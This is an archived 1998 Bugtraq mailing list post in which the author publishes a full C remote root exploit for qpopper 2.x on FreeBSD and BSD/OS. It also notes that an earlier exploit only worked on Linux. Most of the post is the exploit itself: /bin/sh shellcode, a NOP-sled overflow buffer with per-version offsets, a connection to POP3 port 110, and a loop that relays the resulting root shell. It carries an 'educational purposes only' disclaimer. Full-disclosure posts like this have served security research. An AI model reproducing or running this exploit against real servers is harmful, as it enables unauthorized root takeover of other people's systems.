Bugtraq mailing list archives

QPOPPER - FreBSD, BSDI/OS remote exploit

From: mig () SILESIA PL (MiG)
Date: Tue, 30 Jun 1998 10:56:57 +0000


Hello

Herbert Rosmanith's in his remote exploit post heven't mentioned that
it works only against Linux qpopper... it is important becouse it will
not work under BSD systems... (i realize that when i saw those \xcd\x80
what is int 0x80 and this is Linux system call).
Becouse i haven't seen that somone use qpopper under Linux so i think it
is quiet useless.

Here is exploit i wrote which works against every FreeBSD & BSD/OS with
standard qpopper 2.x instalation.

It is for EDUCATIONAL purposes ONLY and use it at your OWN risk!

Any comments welcome...

---x--------x----------x---------cut---------x-------x------x--------x---
/*
 *      QPOPPER - remote root exploit
 *      by Miroslaw Grzybek <mig () zeus polsl gliwice pl>
 *
 *              - tested against: FreeBSD 3.0
 *                                FreeBSD 2.2.x
 *                                BSDI BSD/OS 2.1
 *              - offsets: FreeBSD with qpopper 2.3 - 2.4    0
 *                         FreeBSD with qpopper 2.1.4-R3     900
 *                         BSD/OS  with qpopper 2.1.4-R3     1500
 *
 *      this is for EDUCATIONAL purposes ONLY
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <sys/time.h>
#include        <sys/types.h>
#include        <unistd.h>
#include        <sys/socket.h>
#include        <netinet/in.h>
#include        <netdb.h>

#include        <sys/errno.h>

char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
            "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
            "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
            "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
            "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
            "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define ADDR 0xefbfd504
#define OFFSET 0
#define BUFLEN 1200

char    buf[BUFLEN];
int     offset=OFFSET;

int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;

void main (int argc, char *argv[]) {
        int i;

        if(argc<2) {
                printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
                exit(0);
        }
        if(argc>2)
                offset=atoi(argv[2]);

        /* Prepare buffer */
        memset(buf,0x90,BUFLEN);
        memcpy(buf+800,shell,strlen(shell));
        for(i=901;i<BUFLEN-4;i+=4)
                *(int *)&buf[i]=ADDR+offset;
        buf[BUFLEN]='\n';

        /* Resolve remote hostname & connect*/
        if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0);
        }
        if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0);
        }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(110);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }
        printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
        /* Write evil data */
        write(sock,buf,strlen(buf));

        /* Enjoy root shell ;) */
        while(1) {
                fd_set input;

                FD_SET(0,&input);
                FD_SET(sock,&input);
                if((select(sock+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("CONNECTION CLOSED...\n"); fflush(stdout);
                        exit(1);
                }
                if(FD_ISSET(sock,&input))
                        write(1,buf,read(sock,buf,BUFLEN));
                if(FD_ISSET(0,&input))
                        write(sock,buf,read(0,buf,BUFLEN));
        }
}
---x--------x----------x---------cut---------x-------x------x--------x---

-----------------------------       *-+---+------+---------+------+---+-*
  -----  Miroslaw Grzybek -----     |       PGP KEY AVAILABLE FROM      |
    --mig () zeus polsl gliwice pl--   | http://www.polsl.gliwice.pl/~mig  |
      ----------------------------- *-+---+------+---------+------+---+-*

Current thread:

Re: Vulnerability in 4.4BSD Secure Levels Implementation, (continued)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation tqbf () pobox com (Jun 11)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Niall Smart (Jun 13)
  - Re: Vulnerability in 4.4BSD Secure Levels Implementation Tim Newsham (Jun 26)
  - check-ps 1.2 alpha 4 released Duncan Simpson (Jun 26)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation tqbf () pobox com (Jun 14)
- Re: Vulnerability in 4.4BSD Secure Levels Implementation Niall Smart (Jun 28)
  - Re: Vulnerability in 4.4BSD Secure Levels Implementation Tim Newsham (Jun 28)
  - Re: Vulnerability in 4.4BSD Secure Levels Implementation Roger Harrison ? (Jun 29)
  - Serious Linux 2.0.34 security problem David Luyer (Jun 30)
    - Re: Serious Linux 2.0.34 security problem Jim Bourne (Jun 30)
  - QPOPPER - FreBSD, BSDI/OS remote exploit MiG (Jun 30)